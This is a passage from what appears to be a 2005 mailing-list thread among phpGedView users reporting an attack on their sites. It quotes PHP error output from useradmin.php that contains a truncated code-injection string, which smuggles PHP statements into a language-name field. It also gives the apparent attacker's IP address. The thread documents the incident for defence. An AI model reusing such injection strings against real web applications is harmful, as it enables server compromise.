1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function *unknown*
1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
I run my own server via dynamic DNS... I closed my firewall in time i hope,
I'll let you know.
--
---S.C. Gehl, 'Beauty to Burn'
|
|
From: S.C. G. <alp...@gm...> - 2005-12-20 22:26:02
|
I have just been attacked by the same fellow.... new ip tho. same code for email... My site is unpatched too, it's only been up for 6hours. IP ADDRESS: 65.118.243.76 DNS LOOKUP: curlyjoe.sd.stargateinc.net -- ---S.C. Gehl, 'Beauty to Burn' |
12 messages has been excluded from this view by a project administrator.
